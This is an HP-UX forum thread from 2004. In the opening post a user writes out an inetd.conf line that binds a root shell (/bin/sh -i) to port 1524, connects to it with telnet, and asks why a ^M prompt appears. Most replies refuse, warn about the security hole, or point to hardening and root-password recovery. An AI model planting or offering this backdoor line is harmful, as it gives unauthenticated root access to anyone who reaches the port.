HPE Community
Operating System - HP-UX
1822896 Members
3399 Online
109645 Solutions
New Discussion юеВ

inetd.conf

 
SOLVED
Go to solution
vulgate_1
Occasional Contributor

тАО11-13-2004 01:06 AM

тАО11-13-2004 01:06 AM

inetd.conf

i wanna add a backdoor in my hp unix .
oneway is:

add one line (below) into inetd.conf

ingreslock stream tcp nowait root /bin/sh sh -i

this function is when system startup
then start a network service at port 1524(ingreslock was defined in /etc/services,if the file dont include it ,u can add it)

kill inetd and startup inetd

command:
telnet ip 1524

now u have a root shell~

but my problem is:
cant remove the prompt ' ^M '

i look up it via google,
the result is
if which u add like that

ingreslock stream tcp nowait root /bin/sh

the system whill prompt
^M

but like

ingreslock stream tcp nowait root /bin/sh
sh -i

all is ok~

why ,why ,why?

reference

http://project.honeynet.org/scans/scan20/sol/1/
0 Kudos
Reply
8 REPLIES 8
Geoff Wild
Honored Contributor

тАО11-13-2004 02:51 AM

тАО11-13-2004 02:51 AM

Solution

Re: inetd.conf

Sorry - don't know how to fix your issue - but I have a question for you - why on earth would you do this???

Talk about a major security breach!

I pray your server isn't on the internet - cause just about every hacker in the known universe knows that back door....

There's no need for a back door - ever...if you tried that at just about any security aware company - they would fire you....

You should install Bastille:

http://www.software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6849AA

Rgds...Geoff
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.
Reply
Sridhar Bhaskarla
Honored Contributor

тАО11-13-2004 05:20 PM

тАО11-13-2004 05:20 PM

Re: inetd.conf

Hi,

'sh -i' tells how 'sh' is to be executed. Moreover I am not sure if it is even going to work if you don't specify the arguments on HP-UX implementation (your first attempt). Shell gives prompt only if it is executed with -i option or if it has a tty associated. 'man sh-posix'. It's not designed to run through inetd unlike telnetd/ftpd etc., So, I am not sure if you are going to get 'full' shell capabilities.

As said before, my question back to you is 'why, why, why' would you want to configure it that way intentionally?. The first thing any hacker would do is to 'scan' through all the open ports and connect to them to see if they get any response. And this is a red carpet to them.

-Sri
You may be disappointed if you fail, but you are doomed if you don't try
Reply
Steven E. Protter
Exalted Contributor

тАО11-13-2004 07:15 PM

тАО11-13-2004 07:15 PM

Re: inetd.conf

That is a Solaris doc as I'm sure you are aware. It may create a stable back door on a Solaris machine, but more likely will create a whole big enough for a M1A2 Abrahms tank to drive through.

I'm glad it isn't working on HP-UX.

This kind of thing should not work, not should it be tried.

I can tell you a dozen safe ways to create a backdoor for root access on an HP-UX system. They'd be reasonably scure so long as the unpriviledged user with access to them had a complex password and didn't share.

Tell me what you are trying to accomplish and I may post further relavent advice.

SEP
Steven E Protter
Owner of ISN Corporation
http://isnamerica.com
http://hpuxconsulting.com
Sponsor: http://hpux.ws
Twitter: http://twitter.com/hpuxlinux
Founder http://newdatacloud.com
Reply
vulgate_1
Occasional Contributor

тАО11-14-2004 03:09 PM

тАО11-14-2004 03:09 PM

Re: inetd.conf

thank everyone replay my post
now i answer the question

why why why?

i wanna open a backdoor in this machine~

but i dont know how to do

note: this machin belong to me
not belong to any other one~

who can help me
mailto:vulgatecn@msn.com
thank u~
0 Kudos
Reply
Ivajlo Yanakiev
Respected Contributor

тАО11-14-2004 07:08 PM

тАО11-14-2004 07:08 PM

Re: inetd.conf

You can use ssh or telnet :)
If you want you can change Well know port.
Example you can start your ssh on port 1345
also you can start ssh from /etc/inetd.conf
0 Kudos
Reply
Tim D Fulford
Honored Contributor

тАО11-15-2004 12:08 AM

тАО11-15-2004 12:08 AM

Re: inetd.conf

I dont understand, If the system is yours why do you need a back door? If you are worried about someone hacking in and changing root password and so forth strengthen the systems security dont reduce it.

You also mentioed that this is your system. This means you take responsibility for all mallicious hacks and problems on the system.

If the system keeps freezing and you need another way in (i.e. telnet) I'd suggest tuning the system such that it does not freeze.

If you keep getting locked out for what ever reason, dont make it easy for yourself to hack in, make it hard to lock yourself out in the first place.

Tim & his 0.02├в ┬м wort
-
0 Kudos
Reply
Sridhar Bhaskarla
Honored Contributor

тАО11-15-2004 12:34 AM

тАО11-15-2004 12:34 AM

Re: inetd.conf

Hi,

I will be surprized if anyone posts a 'solution' for you. These forums are intended to fix the stuff not to break. Hacking (whatever you call it) is not encouraged here, that atleast I have seen so far.

-Sri
You may be disappointed if you fail, but you are doomed if you don't try
0 Kudos
Reply
Geoff Wild
Honored Contributor

тАО11-15-2004 01:45 AM

тАО11-15-2004 01:45 AM

Re: inetd.conf

The back door is simple - if you forget root password, TOC the box, then when it say hit any key to interupt the boot sequence - hit a key.

bo pri

Interact with IPL: Y

ISL> hpux -is

That will take you to single user mode - then you can reset the root pass word.

Rgds...Geoff
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.
0 Kudos
Reply
The opinions expressed above are the personal opinions of the authors, not of Hewlett Packard Enterprise. By using this site, you accept the Terms of Use and Rules of Participation.